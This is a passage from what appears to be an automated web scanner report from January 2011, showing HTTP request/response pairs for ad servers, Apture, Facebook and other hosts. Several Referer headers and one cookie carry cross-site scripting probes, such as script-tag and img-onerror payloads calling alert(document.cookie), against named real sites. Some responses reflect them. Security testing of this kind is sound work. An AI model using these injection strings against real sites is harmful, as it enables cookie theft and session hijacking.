<a href='http://ads.dailystar.com.lb/www/delivery/ck.php?oaparams=2__bannerid=409__zoneid=45__cb=4fe95235dc__oadest=http%3A%2F%2Fwww.cineklik.com' target='_blank'><img src='http://ads.dailystar.com.lb/www/images/02303828ed18756d6534202f69102117.gif' width='728' height='90' alt='Cineklik.com :: a Klik away from Movies' title='Cineklik.com :: a Klik away from Movies' border='0' /></a><div id='beacon_4fe95235dc' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://ads.dailystar.com.lb/www/delivery/lg.php?bannerid=409&amp;campaignid=194&amp;zoneid=45&amp;cb=4fe95235dc' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

18.2. http://as1.whdh.com/pan/adjs.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as1.whdh.com
Path:   /pan/adjs.php

Request 1

GET /pan/adjs.php?n=589498189&what=zone:238&target=_parent&exclude=, HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906310538946; path=/
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Content-Length: 919
Connection: close
Content-Type: application/x-javascript

var phpadsbanner = '';

phpadsbanner += '<'+'a href=\'http://as1.whdh.com/pan/adclick.php?bannerid=1594&amp;zoneid=238&amp;source=&amp;dest=http%3A%2F%2Fwhdhstore.hipcricket.com%2F\' target=\'_blank\' onMouseOver="self.status=\'Sign up today for Snow Day alerts\'; return true;" onMouseOut="self.status=\'\';return true;"><'+'img src=\'http://as1-cache.whdh.com/as-images/snow-day-alert-banner-bug.png\' width=\'234\' height=\'60\' alt=\'Sign up today for Snow Day alerts\' title=\'Sign up today for Snow Day alerts\' border=\'0\'><'+'/a><'+'div id="beacon_1594" style="position: absolute; left: 0px; top: 0px; visibility: hidden;"><'+'img src=\'http://as1.whdh.com/pan/adlog.php?bannerid=1594&amp;clientid=1234&amp;zoneid=238&amp;source=&amp;block=0&amp;capping=0&amp;cb=0e40a7afd8c1943a08cf5f5111f91d66\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\'><'+'/div>';

document.write(phpadsbanner);

Request 2

GET /pan/adjs.php?n=589498189&what=zone:238&target=_parent&exclude=, HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906312726447; path=/
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.3. http://as1.whdh.com/pan/adx.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as1.whdh.com
Path:   /pan/adx.js

Request 1

GET /pan/adx.js HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906309132609; path=/
Last-Modified: Tue, 05 Jun 2007 15:13:18 GMT
ETag: "2802dd-46-1f0fff80"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: application/x-javascript

function phpads_deliverActiveX(content)
{
   document.write(content);    
}

Request 2

GET /pan/adx.js HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906310198222; path=/
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.4. http://as2.whdh.com/m/m.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as2.whdh.com
Path:   /m/m.php

Request 1

GET /m/m.php?pass=2&1295906066 HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php?pass=2&1295906066 HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.5. http://as2.whdh.com/m/m.php/1295906165143/m.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as2.whdh.com
Path:   /m/m.php/1295906165143/m.gif

Request 1

GET /m/m.php/1295906165143/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295906165143/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.6. http://as2.whdh.com/m/m.php/1295906189027/m.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as2.whdh.com
Path:   /m/m.php/1295906189027/m.gif

Request 1

GET /m/m.php/1295906189027/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295906189027/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.7. http://as2.whdh.com/m/m.php/1295906202010/m.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as2.whdh.com
Path:   /m/m.php/1295906202010/m.gif

Request 1

GET /m/m.php/1295906202010/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295906202010/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:35 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.8. http://as2.whdh.com/m/m.php/1295920516924/m.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as2.whdh.com
Path:   /m/m.php/1295920516924/m.gif

Request 1

GET /m/m.php/1295920516924/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www3.whdh.com/mobile/phoneforecast/settings.php/5bebc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb51006e4a2e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 1

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:27:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295920516924/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.9. http://as2.whdh.com/m/m.php/1295920639137/m.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as2.whdh.com
Path:   /m/m.php/1295920639137/m.gif

Request 1

GET /m/m.php/1295920639137/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www3.whdh.com/mobile/phoneforecast/settings.php/5bebc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb51006e4a2e
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 1

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295920639137/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:27:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.10. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.parenthood.com
Path:   /kickapps/service/getWidgetSwf.kickAction

Request 1

GET /kickapps/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:28:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=8278D530E5DF18EDAEA83D02F203E614; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:28:37 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

Request 2

GET /kickapps/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:28:59 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=25F6F0AD2E12E2EAF433B82F8EA5E590; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:28:59 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8


18.11. http://www.apture.com/js/apture.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Request 1

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 22:22:50 GMT
Last-Modified: Mon, 24 Jan 2011 22:22:50 GMT
Etag: "fe64353a9a49f053ee471e7afdd40f25"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=pkZW6xftC5; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1657
Date: Mon, 24 Jan 2011 22:22:50 GMT
Connection: close


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22";A.visitId=199462424358761;A.abtests={};A.userCookieId=null;
A.siteToken="5rLcDWk";

A.brandingType=4;
A.capabilities=268;

A.getPage=function(){return apture.make("Page", {timestamp:1295903504.0,id:201236214,links:[],tmmLinks:[]});};
A.siteId=197235;
A.maxPageLinks=200;
A.platformName="WordpressOrg";
A.platformId=9;

A.barTitle="Star Scene";

A.barColor="#990000";
A.barTitleColor="#ffffff";

A.siteSearchUrl="http://starscene.dailystar.com.lb/";
A.shadowColor="#000000";

A.twitterHandle="StarSceneLB";






A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".js?v=21531601";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

Request 2

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 22:22:51 GMT
Last-Modified: Mon, 24 Jan 2011 22:22:51 GMT
Etag: "f4dd6ce6d346fadfa75b7a6ff5f61fca"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=GGqoIIAaOx; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1425
Date: Mon, 24 Jan 2011 22:22:51 GMT
Connection: close


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="";A.visitId=69281105882904;A.abtests={};A.userCookieId=null;
A.siteToken="5rLcDWk";

A.brandingType=4;
A.capabilities=268;

A.getPage=function(){return apture.make("Page", {id:0});};
A.siteId=197235;
A.maxPageLinks=200;
A.platformName="WordpressOrg";
A.platformId=9;

A.barTitle="Star Scene";

A.barColor="#990000";
A.barTitleColor="#ffffff";

A.siteSearchUrl="http://starscene.dailystar.com.lb/";
A.shadowColor="#000000";

A.twitterHandle="StarSceneLB";






A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".js?v=21531601";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

18.12. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:25:01 GMT
Content-Length: 1309

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"","channel":"http:\/\/stars
...[SNIP]...
com.lb\/wp-content\/plugins\/fbconnect\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/starscene.dailystar.com.lb\/music-scenea960d\u002522\u00253E\u00253Cscript\u00253Ealert(document.cookie)\u00253C\/script\u00253Eb7d5247b69c\/2010\/11\/pianist-geoffrey-saba-performs-at-aubs-assembly-hall\/x22","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:25:38 GMT
Content-Length: 1094

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"","channel":"http:\/\/stars
...[SNIP]...
